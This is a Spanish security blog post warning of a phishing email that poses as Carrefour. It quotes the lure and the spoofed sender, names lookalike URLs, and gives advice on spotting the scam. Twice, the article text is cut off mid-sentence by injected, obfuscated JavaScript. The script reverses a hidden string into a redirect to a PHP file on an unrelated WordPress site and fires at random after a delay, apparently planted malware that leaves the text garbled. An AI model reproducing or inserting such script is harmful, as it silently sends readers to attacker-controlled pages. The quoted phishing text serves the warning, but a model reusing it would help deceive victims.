NUEVO MAIL MASIVO MALICIOSO EN ESPAÑA, CON PHISHING UTILIZANDO LA CADENA DE SUPERMERCADOS CARREFOUR
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos.jpg?x=634&y=309″ width=”634″ height=”309″ /></p>
<p>Los ciberdelincuentes vuelven a la carga con una nueva campaña spam. En esta ocasión es la cadena de supermercados Carrefour la que ha “prestado” su imagen. En el correo electrónico que están recibiendo los usuarios se puede ver como se informa de un problema con la cuenta. Posteriormente el usuario es redirigido en una página web donde deberá introducir sus credenciales de acceso, siendo en este momen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to robadas.
Nos encontramos inmersos en la Navidad y muy pronto comenzarán las rebajas de enero, por lo que las condiciones son inigualables. Se tratan de ciclos que se repiten cada año, encontrando picos de mensajes spam a las puertas del verano y durante la época invernal. Viajes, bancos, tiendas, cualquier temática es buena para robar los datos de acceso de los usuarios a entidades bancarias o tiendas y datos relacionados con las formas de pago. Es decir, tarjetas de crédito y servicios como PayPal.
En el cuerpo del correo electrónico que nos ocupa, se detalla un problema con la cuenta de acceso, procediendo a su bloqueo por una operación que no termino de forma correcta.
Partiendo de que Carrefour ofrece a sus clientes una tarjeta de crédito propia, la estafa toma mayor credibilidad.
Este es el cuerpo del mensaje al que hemos hecho referencia:
MAIL MALICIOSO:
________________
-Le notificamos que su cuenta y tarjeta esta bloqueada temporalmente debido a que su ultima consulta de cajero o banca en linea no finalizo de manera corecta
-Para poder des bloquear la tarjeta es necesario afiliar y hacer una pequena verificacion de identidad. Para verificar su identidad AQUI
-Su Tarjeta Visa/Master debe ser sincronizada y reactivada de acuerdo a su usuario de acceso.
-Una vez emitido este correo electronico tendra un plazo de 8 horas para llevar acabo dicha accion de lo contrario y por medidas de seguridad su tarjeta 5499-xxxx-xxxx-xxxx sera descontinuada.
-Luego terminando el proceso solicitado,presiona Continuar. A partir de aqui,podras seguir realizando sus tranzacciones de la manera acostumbrada
__________________
FIN MAIL MALICIOSO
Además de faltas de ortografía, la sintaxis deja mucho que desear, siendo uno de los indicativos en estos casos de que nos encontramos ante una estafa.
Si esto no es suficiente, hay que decir que el correo electrónico se está enviando desde Administrator@avens.carrefor.es, una dirección que no pertenece a la cadena de supermercados.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos-655×392.jpg” width=”655″ height=”392″ /></p>
<p>Página web falsa de Carrefour para proceder al robo de las credenciales de acceso</p>
<p>En el propio cuerpo del mensaje que hemos citado con anterioridad, los usuarios disponen de un enlace que aparece en dos ocasiones y que redirigirá al usuario a lo que a priori parece una página web de la cadena. Pero es<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to no es así, y tal y como se puede imaginar, se trata de un sitio web falso.
Una prueba de ello es la URL que es nada más y nada menos que http: //es-carrefour.com/tarjeta-pass/sfi/index.htm. Muy diferente de la legítima que es http: //www.carrefour.es/pass/.
Si se acceden a ambas de forma simultánea se podrá observar que el parecido es muy alto. Pero en estos casos siempre existe alguna diferencia por pequeña que sea.
En esta ocasión, con la estafa se pretende realizar el robo de las credenciales de acceso a la cuenta de Carrefour Pass, redirigiendo al usuario a otra web cuya dirección es http: //es-carrefour.com/tarjeta-pass/sfi/homesfc.htm. Esta última es bastante conocida por el equipo de RedesZone, ya que en otras ocasiones ya hemos reportado la existencia de página similares.
¿Cómo hacer frente a estas situaciones?
Obviamente más de uno puede tener dudas sobre la legitimidad del correo. Para corroborar el contenido de este solo es necesario ponerse en contacto con el servicio (en este caso Carrefour) o bien acceder a la página web del servicio, pero de forma directa, tecleando la dirección en el navegador y no a través de los enlaces existentes en el correo electrónico.
Ver información original al respecto en Fuente:
https://www.redeszone.net/2016/12/28/carrefour-nuevo-la-imagen-una-campana-phishing-espana/#sthash.Uk6ociEf.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.